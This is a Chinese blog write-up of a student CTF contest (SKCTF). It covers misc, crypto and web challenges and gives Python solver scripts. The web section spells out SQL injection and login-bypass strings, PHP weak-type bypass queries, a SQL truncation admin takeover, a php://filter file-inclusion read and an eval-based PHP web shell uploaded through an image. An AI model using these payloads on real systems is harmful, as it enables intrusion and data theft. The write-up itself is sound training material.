<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="SKCTF1 -总结"><meta name="keywords" content=""><meta name="author" content="V0WKeep3r,v0wldl@163.com"><meta name="copyright" content="V0WKeep3r"><title>SKCTF1 -总结 | V0W's Blog</title><link rel="shortcut icon" href="/favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="V0W's Blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#GetScore"><span class="toc-text">GetScore</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Msic"><span class="toc-text">Msic</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B1%B1%E4%B8%9C%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6"><span class="toc-text">山东科技大学</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%98%85%E8%AF%BB%E7%90%86%E8%A7%A3"><span class="toc-text">阅读理解</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%A7%E5%AE%B6%E6%9D%A5%E6%89%BE%E8%8C%AC"><span class="toc-text">大家来找茬</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A5%B3%E7%A5%9E%E7%9A%84qq%E5%8F%B7"><span class="toc-text">女神的qq号</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Manchester"><span class="toc-text">Manchester</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Crypto"><span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%87%AF%E6%92%92%E5%A4%A7%E5%B8%9D"><span class="toc-text">凯撒大帝</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B7%A8%E8%BF%87%E5%8E%BB%E5%95%8A"><span class="toc-text">跨过去啊</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E8%A1%8C%E6%83%85%E4%B9%A6"><span class="toc-text">三行情书</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#mix"><span class="toc-text">mix</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web"><span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%88%91%E8%BF%98%E6%98%AF%E5%BE%88%E7%88%B1%E5%A5%B9"><span class="toc-text">我还是很爱她</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B1%B1%E4%B8%9C%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6-1"><span class="toc-text">山东科技大学</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%8F%E7%BB%84%E4%BA%BA%E5%91%98%E6%9C%9F%E6%9C%AB%E6%88%90%E7%BB%A9"><span class="toc-text">小组人员期末成绩</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SKCTF%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0"><span class="toc-text">SKCTF管理平台</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%80%81%E6%9D%BF%E7%BB%93%E8%B4%A6"><span class="toc-text">老板结账</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#NotGet"><span class="toc-text">NotGet</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Misc"><span class="toc-text">Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90"><span class="toc-text">流量分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E5%9B%9B%E6%89%A9%E5%B1%95FS"><span class="toc-text">第四扩展FS</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Crypto-1"><span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BD%AC%E5%95%8A%E8%BD%AC%E5%95%8A%E8%BD%AC"><span class="toc-text">转啊转啊转</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-1"><span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8C%AE%E4%B8%8A%E4%BD%A0%E7%9A%84%E5%A3%81%E7%BA%B8%E5%90%A7"><span class="toc-text">献上你的壁纸吧</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%86%9F%E6%82%89%E5%90%97"><span class="toc-text">熟悉吗</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/Kaneki.jpg"></div><div class="author-info__name text-center">V0WKeep3r</div><div class="author-info__description text-center">Stay Hungry, Stay Foolish.</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/qingchenldl">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">58</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">31</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">11</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">友链</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://zhuxianjin.github.io/">J0k3r</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0desta.com/">p0desta</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://daolgts.github.io/">dlgts</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://iwenhu.cn/">mengchen</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0sec.net/">p0</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://asa9ao.xyz/">唯湖</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://seaii-blog.com/">seaii</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://wzt.ac.cn/">WCatalpa.T</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://syf.ac.cn/">7N1ght</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://www.nicefish.top/posts/">nicefish</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://flag0.com/">GetFlag</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/index.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">V0W's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">文章</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a><a class="site-page" href="/about">关于我</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">SKCTF1 -总结</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2018-04-14</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/CTF/">CTF</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">2.7k</span><span class="post-meta__separator">|</span><span>阅读时长: 11 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>4-14<br>小组组内CTF比赛，很多不会的，发现很多问题，打算从做出的和没做出的两方面来总结一下。</p>
<h1 id="GetScore"><a href="#GetScore" class="headerlink" title="GetScore"></a>GetScore</h1><hr>
<h1 id="Msic"><a href="#Msic" class="headerlink" title="Msic"></a>Msic</h1><h2 id="山东科技大学"><a href="#山东科技大学" class="headerlink" title="山东科技大学"></a>山东科技大学</h2><p>一半在属性信息里，记事本打开最后一行有另一半的BASE64。</p>
<h2 id="阅读理解"><a href="#阅读理解" class="headerlink" title="阅读理解"></a>阅读理解</h2><p>一个word文件，查看隐藏文字。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180414/6jJlElke9C.png?imageslim" alt="mark"></p>
<p>另一半在哪呢？<br>notepad++打开，发现文件头是PK于是改了后缀.zip，解压后，得到xml文件。<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180414/jbCHi0mJG6.png?imageslim" alt="mark"></p>
<h2 id="大家来找茬"><a href="#大家来找茬" class="headerlink" title="大家来找茬"></a>大家来找茬</h2><p>就是两个文本的比较，网上很容易搜到原文，与给出的文本比较一下，就出来了。<br><a target="_blank" rel="noopener" href="https://tool.lu/diff/">https://tool.lu/diff/</a><br><a target="_blank" rel="noopener" href="http://www.jq22.com/textDifference">http://www.jq22.com/textDifference</a></p>
<h2 id="女神的qq号"><a href="#女神的qq号" class="headerlink" title="女神的qq号"></a>女神的qq号</h2><blockquote>
<p>女神换了一个新的QQ号码，原来的号码和新的号码都是5位靓号哦；其次，新的号码是原来号码的4倍，并且原来的号码倒着写正好是新的号码，请问，新号码是多少，新号码即为key。</p>
</blockquote>
<p>编程题，暴力python走起。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">#python2</span><br><span class="line">for i in range(0,10):</span><br><span class="line">  for j in range(0,10):</span><br><span class="line">    for k in range(0,10):</span><br><span class="line">      for m in range(0,10):</span><br><span class="line">        for n in range(0,10):</span><br><span class="line">			last &#x3D; i*10000+j*1000+k*100+m*10+n   </span><br><span class="line">			new &#x3D; i+j*10+k*100+m*1000+n*10000    </span><br><span class="line">			if new &#x3D;&#x3D; 4*last :</span><br><span class="line">				print new</span><br></pre></td></tr></table></figure>

<h2 id="Manchester"><a href="#Manchester" class="headerlink" title="Manchester"></a>Manchester</h2><p>曼彻斯特编码<br>01 -&gt; 0<br>10 -&gt; 1<br>0 -&gt; 01<br>1 -&gt; 10<br><a target="_blank" rel="noopener" href="http://eleif.net/manchester.html">曼彻斯特编码解密</a></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">#coding: utf-8</span><br><span class="line">&#39;&#39;&#39;</span><br><span class="line">曼彻斯特编码+计数</span><br><span class="line">&#39;&#39;&#39;</span><br><span class="line">print &quot;曼彻斯特编码\n&quot;</span><br><span class="line">file &#x3D; open(&#39;misc.txt&#39;,&#39;r&#39;)</span><br><span class="line">r &#x3D; file.read()</span><br><span class="line">file.close()</span><br><span class="line">res &#x3D; &#39;&#39;</span><br><span class="line">count &#x3D; 0</span><br><span class="line">for i in xrange(len(r)&#x2F;2):</span><br><span class="line">	c &#x3D; r[i*2:i*2+2]</span><br><span class="line">	count +&#x3D;1</span><br><span class="line">	if c&#x3D;&#x3D;&#39;01&#39;:</span><br><span class="line">		res +&#x3D; &#39;1&#39;</span><br><span class="line">	elif c&#x3D;&#x3D;&#39;10&#39;:</span><br><span class="line">		res +&#x3D; &#39;0&#39;</span><br><span class="line">#print res		</span><br><span class="line">print count</span><br><span class="line">f &#x3D; open(&#39;res.txt&#39;,&#39;w&#39;)</span><br><span class="line">f.write(res)</span><br><span class="line">f.close()</span><br><span class="line">print &quot;done&quot;</span><br></pre></td></tr></table></figure>
<p>解出来还是一堆的01，但是很明显很多的00000000连在一起很多的11111111连在一起，怀疑是一张黑白点阵图（280*280）。接下来就是python大法来写脚本，生成图片。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">#python 3</span><br><span class="line">from PIL import Image</span><br><span class="line">a &#x3D; 280</span><br><span class="line">pic &#x3D; Image.new(&quot;RGB&quot;,(a,a))</span><br><span class="line">file &#x3D; open(&quot;res.txt&quot;,&#39;r&#39;)</span><br><span class="line">str &#x3D; file.read()</span><br><span class="line">file.close()</span><br><span class="line"></span><br><span class="line">i&#x3D;0</span><br><span class="line">for y in range(0,a):</span><br><span class="line">	for x in range(0,a):</span><br><span class="line">		if(str[i]&#x3D;&#x3D;&#39;1&#39;):</span><br><span class="line">			pic.putpixel([x,y],(0,0,0,))</span><br><span class="line">		else:</span><br><span class="line">			pic.putpixel([x,y],(255,255,255))  #反过来也可</span><br><span class="line">		i +&#x3D; 1		</span><br><span class="line">pic.save(&quot;flag.png&quot;)</span><br><span class="line">print(&quot;done&quot;)</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180414/DHkm4EiL35.png?imageslim" alt="mark"><br>QRsearch扫描就行。<br>SKCTF{ManchesterAndRGB}</p>
<h1 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h1><h2 id="凯撒大帝"><a href="#凯撒大帝" class="headerlink" title="凯撒大帝"></a>凯撒大帝</h2><p>一个gif，但是文件头被破坏了，添加标识GIF89a 即可，可以看到密文：<br>CUMDP{foxs_fsns_fsms}</p>
<p>接下来凯撒解密即可。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">message &#x3D; &#39;CUMDP&#123;foxs_fsns_fsms&#125;&#39;</span><br><span class="line">LETTERS &#x3D; &#39;ABCDEFGHIJKLMNOPQRSTUVWXYZ&#39;</span><br><span class="line">letters &#x3D; &#39;abcdefghijklmnopqrstuvwxyz&#39;</span><br><span class="line"></span><br><span class="line">for key in range(len(LETTERS)):</span><br><span class="line">   tran &#x3D; &#39;&#39;</span><br><span class="line">   for i in message:</span><br><span class="line">       if i in LETTERS:</span><br><span class="line">           num &#x3D; LETTERS.find(i)</span><br><span class="line">           num &#x3D; num - key</span><br><span class="line">           if num &lt; 0:</span><br><span class="line">               num &#x3D; num + len(LETTERS)</span><br><span class="line">           tran &#x3D; tran + LETTERS[num]</span><br><span class="line">       elif i in letters:</span><br><span class="line">           num &#x3D; letters.find(i)</span><br><span class="line">           num &#x3D; num - key</span><br><span class="line">           if num &lt; 0:</span><br><span class="line">               num &#x3D; num + len(letters)</span><br><span class="line">           tran &#x3D; tran + letters[num]</span><br><span class="line">       else:</span><br><span class="line">           tran &#x3D; tran + i</span><br><span class="line">   print(&#39;key &#x3D; %s: %s&#39; % (key, tran))</span><br></pre></td></tr></table></figure>

<h2 id="跨过去啊"><a href="#跨过去啊" class="headerlink" title="跨过去啊"></a>跨过去啊</h2><p>栅栏密码</p>
<h2 id="三行情书"><a href="#三行情书" class="headerlink" title="三行情书"></a>三行情书</h2><pre><code>U0tDVEZ7     BASE64

626162795f49    16进制

L5WDA5TFL5MTA5L5     BASE32</code></pre>
<h2 id="mix"><a href="#mix" class="headerlink" title="mix"></a>mix</h2><p>多次的base16，base32，base64加密：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">from base64 import *</span><br><span class="line"></span><br><span class="line">result &#x3D; &#123;</span><br><span class="line">    &#39;16&#39;:lambda x :b16decode(x),</span><br><span class="line">    &#39;32&#39;:lambda x :b32decode(x),</span><br><span class="line">    &#39;64&#39;:lambda x :b64decode(x),</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">flag &#x3D; open(&#39;mix.txt&#39;,&#39;r&#39;)</span><br><span class="line">b &#x3D; flag.read()</span><br><span class="line"># print b</span><br><span class="line"></span><br><span class="line">num &#x3D; (&#39;16&#39;,&#39;32&#39;,&#39;64&#39;)</span><br><span class="line"></span><br><span class="line">for i in range(20):</span><br><span class="line">    for k in num:</span><br><span class="line">        try:</span><br><span class="line">            b &#x3D; result[k](b)</span><br><span class="line">            if b:</span><br><span class="line">                break</span><br><span class="line">            else:</span><br><span class="line">                continue</span><br><span class="line">        except:</span><br><span class="line">            pass</span><br><span class="line">print(b)</span><br></pre></td></tr></table></figure>

<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="我还是很爱她"><a href="#我还是很爱她" class="headerlink" title="我还是很爱她"></a>我还是很爱她</h2><p>php弱类型<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180415/Gc1G2Hi8el.png?imageslim" alt="mark"><br>源码有code.txt，如下：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(isset($_GET[&#39;v1&#39;]) &amp;&amp; isset($_GET[&#39;v2&#39;]) &amp;&amp; isset($_GET[&#39;v3&#39;]))&#123;</span><br><span class="line">    $v1 &#x3D; $_GET[&#39;v1&#39;];</span><br><span class="line">    $v2 &#x3D; $_GET[&#39;v2&#39;];</span><br><span class="line">    $v3 &#x3D; $_GET[&#39;v3&#39;];</span><br><span class="line">    if($v1 !&#x3D; $v2 &amp;&amp; md5($v1) &#x3D;&#x3D; md5($v2))&#123;</span><br><span class="line">        if(!strcmp($v3, $flag))&#123;</span><br><span class="line">            echo $flag;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>显然，v1,v2用著名的就行<br>md5(‘240610708’) == md5(‘QNKCDZO’)就行，strcmp函数是<br>strcmp函数比较字符串的本质是将两个变量转换为ascii，然后进行减法运算，然后根据运算结果来决定返回值。</p>
<p>如果传入给出strcmp()的参数是数字呢？</p>
<pre><code>$array=[1,2,3];
var_dump(strcmp($array,&#39;123&#39;)); //null,在某种意义上null也就是相当于false。</code></pre>
<p>于是构造payload：</p>
<pre><code>?v1=240610708&amp;v2=QNKCDZO&amp;v3[]=[1,2,3]</code></pre>
<p>payload2：</p>
<pre><code>?v1[]=a&amp;v2[]=b&amp;v3[]=[1,2,3]</code></pre>
<p>payload2的原理在于，md5不处理数组，比较不相等的时候，两个数组不同.</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"> &lt;?php </span><br><span class="line">if(@md5($_GET[&#39;a&#39;]) &#x3D;&#x3D; @md5($_GET[&#39;b&#39;]))</span><br><span class="line">&#123;</span><br><span class="line">    echo &quot;yes&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt; </span><br><span class="line">&#x2F;&#x2F;结果：yes</span><br></pre></td></tr></table></figure>


<h2 id="山东科技大学-1"><a href="#山东科技大学-1" class="headerlink" title="山东科技大学"></a>山东科技大学</h2><p>源码里面就有flag的一半，响应头有另一半。</p>
<h2 id="小组人员期末成绩"><a href="#小组人员期末成绩" class="headerlink" title="小组人员期末成绩"></a>小组人员期末成绩</h2><p>有回显的sql报错注入。<br>    id=-1’ union select 1,2,3,4 –+<br>有回显，四个字段。</p>
<pre><code>id=-1&#39; union select database(),2,3,4 --+ </code></pre>
<p>得到数据库名 skctf_flag</p>
<pre><code>id=-1&#39; union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+ </code></pre>
<p>得到表名 fl4g,sc</p>
<pre><code> id=-1&#39; union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=&#39;fl4g&#39; --+ </code></pre>
<p>得到字段skctf_flag</p>
<p><strong>payload</strong><br>id=-1’ union select 1,2,3,skctf_flag from fl4g #</p>
<h2 id="SKCTF管理平台"><a href="#SKCTF管理平台" class="headerlink" title="SKCTF管理平台"></a>SKCTF管理平台</h2><p>sql约束攻击</p>
<blockquote>
<p>在SQL中执行字符串处理时，字符串末尾的空格符将会被删除。换句话说“vampire”等同于“vampire ”，对于绝大多数情况来说都是成立的（诸如WHERE子句中的字符串或INSERT语句中的字符串）例如以下语句的查询结果，与使用用户名“vampire”进行查询时的结果是一样的。</p>
<p>SELECT * FROM users WHERE username=’vampire     ‘;</p>
<p>但也存在异常情况，最好的例子就是LIKE子句了。注意，对尾部空白符的这种修剪操作，主要是在“字符串比较”期间进行的。这是因为，SQL会在内部使用空格来填充字符串，以便在比较之前使其它们的长度保持一致。</p>
</blockquote>
<p>因此，这题其实就很简单了。原来的数据库我们不知道admin的密码，但是，由于给了我们注册的页面，其实没有对空格做过滤，那么我们就可以注册新的账号‘admin   ’，密码自定记得住就行。<br>SQL语句：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">INSERT INTO users VALUES(&#39;admin&#39;,&#39;ldl123LDL&#39;)</span><br></pre></td></tr></table></figure>
<p>于是该用户将原来的admin覆盖了，于是我们就可以用管理员权限登陆了。</p>
<h2 id="老板结账"><a href="#老板结账" class="headerlink" title="老板结账"></a>老板结账</h2><p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180415/jKkaLbL55i.png?imageslim" alt="mark"></p>
<p>刷新一下，页面中的物品价格就又有区别了，但是源码有一定规律，可以通过规律把价格提取出来，作和得到结果，requests提交就行。</p>
<pre><code>bread---5150&lt;/br&gt;chicken---3328&lt;/br&gt;Salmon---2039&lt;/br&gt;halibut---3921&lt;/br&gt;trout---4418&lt;/br&gt;mackerel---5589&lt;/br&gt;lunchmeat---5482&lt;/br&gt;beef---4537&lt;/br&gt;rice---3096</code></pre>
<p>python脚本如下：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">import requests</span><br><span class="line">import re</span><br><span class="line">url &#x3D; &#39;http:&#x2F;&#x2F;192.168.211.105:49170&#x2F;&#39;</span><br><span class="line">s &#x3D; requests.Session()</span><br><span class="line">source &#x3D; s.get(url)</span><br><span class="line">html &#x3D; source.text</span><br><span class="line">expression &#x3D; re.findall(r&#39;(?&lt;&#x3D;---)\d*(?&#x3D;&lt;&#x2F;br&gt;)&#39;, html)</span><br><span class="line">#print(expression)</span><br><span class="line">res &#x3D; 0</span><br><span class="line">for i in expression:</span><br><span class="line">	res +&#x3D; int(i)</span><br><span class="line">print(res)</span><br><span class="line">url +&#x3D; &#39;?money&#x3D;&#39;</span><br><span class="line">url +&#x3D; str(res)</span><br><span class="line">print(s.get(url).text)</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180415/gEHAHijBC6.png?imageslim" alt="mark"></p>
<hr>
<h1 id="NotGet"><a href="#NotGet" class="headerlink" title="NotGet"></a>NotGet</h1><hr>
<h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h2 id="流量分析"><a href="#流量分析" class="headerlink" title="流量分析"></a>流量分析</h2><blockquote>
<p>将你获得的明显信息md5加密之后以SKCTF{xxx}的格式提交</p>
</blockquote>
<p>这题没做出来很可惜，一直不知道明显的信息是指什么，我找到http的一个GET请求，但是</p>
<h2 id="第四扩展FS"><a href="#第四扩展FS" class="headerlink" title="第四扩展FS"></a>第四扩展FS</h2><blockquote>
<p>D公司正在调查一起内部数据泄露事件，锁定嫌疑人小明，取证人员从小明手机中获取了一张图片引起了怀疑。这是一道送分题，提示已经在题目里，日常违规审计中频次有时候非常重要。<br>flag格式：DDCTF{}</p>
</blockquote>
<p>下载下来一个图片12.6M,肯定有猫腻！</p>
<p>Linux:<br>foremost windows.jpg</p>
<p>解压文件（密码在属性-&gt;备注）</p>
<p>得到一堆如同乱码似的的字符串，贼tm大。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180419/7ml4D8aFFL.png?imageslim" alt="mark">   </p>
<p>注意到提示！！！！<br>词频统计！！</p>
<p>但是一开始思路还是错了，以为是那种类似凯撒解密似的，但事实上不是的，因为看不出什么规律，于是想到分别统计每个字符的次数，发现一些有意思的东西。<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180419/6gmcd8IGjk.png?imageslim" alt="mark">   </p>
<p>这不就是flag吗？</p>
<p>写了个脚本（练习吧）：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">import operator</span><br><span class="line"></span><br><span class="line">with open(&#39;file.txt&#39;, mode&#x3D;&#39;r&#39;, encoding&#x3D;&#39;utf-8&#39;) as inFile:</span><br><span class="line">    d&#x3D;&#123;&#125;      # 创建一个空字典</span><br><span class="line">    word&#x3D;&#39;&#39;      # 空字符串以便于连接字符</span><br><span class="line">    for char in inFile.read():</span><br><span class="line">            word +&#x3D; char   # 连接字符</span><br><span class="line">            if word in d:</span><br><span class="line">                d[word]+&#x3D;1</span><br><span class="line">                word&#x3D;&#39;&#39;        # 将word置为空，否则，word值无限增大</span><br><span class="line">            else:</span><br><span class="line">                d.setdefault(word, 1)</span><br><span class="line">                word&#x3D;&#39;&#39;</span><br><span class="line"></span><br><span class="line">lst &#x3D; sorted(d.items(),key &#x3D; lambda x:int(x[1]),reverse &#x3D; True)</span><br><span class="line">#print(lst)</span><br><span class="line">d &#x3D; dict(lst)</span><br><span class="line">#print(d)	</span><br><span class="line">for key in d.keys():</span><br><span class="line">	print(key,end&#x3D;&#39;&#39;)	</span><br><span class="line">with open(&#39;res.txt&#39;, mode&#x3D;&#39;w&#39;, encoding&#x3D;&#39;utf-8&#39;) as outFile:</span><br><span class="line"></span><br><span class="line">    for word, freq in d.items():</span><br><span class="line">        s &#x3D; &#39;&#123;0&#125;\t&#123;1&#125;\n&#39;.format(word, freq)</span><br><span class="line">        outFile.write(s)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180419/ma9kEfJLek.png?imageslim" alt="mark"><br>但是注意一下，D出现3950 C:1900<br>所以D应该算成两个，这样 2000-1950-1900-1850…</p>
<p>即flag：<br>DDCTF{ka1f4NgxIntAi}</p>
<h1 id="Crypto-1"><a href="#Crypto-1" class="headerlink" title="Crypto"></a>Crypto</h1><h2 id="转啊转啊转"><a href="#转啊转啊转" class="headerlink" title="转啊转啊转"></a>转啊转啊转</h2><blockquote>
<p>Hint：密钥前1-3个字符为三个转子的排列顺序（用数字表示） 4-6为转子的起始位置，flag大写<br>密文：EBBBBDDED<br>（结果加上skctf{}提交）</p>
</blockquote>
<h1 id="Web-1"><a href="#Web-1" class="headerlink" title="Web"></a>Web</h1><h2 id="献上你的壁纸吧"><a href="#献上你的壁纸吧" class="headerlink" title="献上你的壁纸吧"></a>献上你的壁纸吧</h2><p>看到file=index.php?file=hello.php，<br>猜想是文件包含，于是尝试：<br>    index.php?file=php://filter/read=convert.base64-encode/resource=index.php<br>得到提示：</p>
<pre><code>&lt;!-- upload.php --&gt;
&lt;h1&gt;NAIVE!!!&lt;/h1&gt;</code></pre>
<p>upload.php：<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180415/FBKAc99a6a.png?imageslim" alt="mark"></p>
<p>很明显，应该是文件上传漏洞，可是FK的是，我就是一直以为上传图片，通过以后，改成php，就能得到flag了（之前做的题留下惯性思维），感觉自己很SB。<br>由于该题做了过滤和改名，改不成php，直接连是不行的。</p>
<p>其实应该联系前面的包含漏洞！！！！！<br>上传木马图片以后：<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180415/G81hFi76kh.png?imageslim" alt="mark"></p>
<p>给了路径，可以进行文件包含访问，文件包含访问时，以php形式解析：<br>回到index.php</p>
<pre><code>index.php?file=upload/201804150852185399.jpg</code></pre>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180415/elG0A2JIdj.png?imageslim" alt="mark"><br>但是，似乎将<?php ?>给改了，接下来就是尝试绕过这个就OK了。<br>查到<br>可以使用PHP标记</p>
<pre><code>&lt;script language=&quot;php&quot;&gt;
eval($_POST[&#39;a&#39;]);
&lt;/script&gt;</code></pre>
<p>getshell得到flag。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180415/fCilF22J2I.png?imageslim" alt="mark"></p>
<h2 id="熟悉吗"><a href="#熟悉吗" class="headerlink" title="熟悉吗"></a>熟悉吗</h2><p>熟悉==、之前介绍命令执行的时候，就举的这个例子。</p>
<p>比赛时都没注意响应头：<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180415/8dBAjchKG9.png?imageslim" alt="mark"></p>
<p>有tips,base64解码后：</p>
<pre><code>$sql=&quot;SELECT username,password FROM admin WHERE username=(&quot;.$username.&quot;)&quot;;
if (!empty($row) &amp;&amp; $row[\&#39;password\&#39;]===md5($password))&#123;&#125;</code></pre>
<p>万用密码：<br>‘ union select 1,md5(1)# &amp; passwd=1<br>登陆<br><strong>原理：</strong><br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180419/EH0jeG0L54.png?imageslim" alt="mark"><br>可以看到，其实admin表里没有任何内容，是空表，但是我们依然可以union select得到查询集。</p>
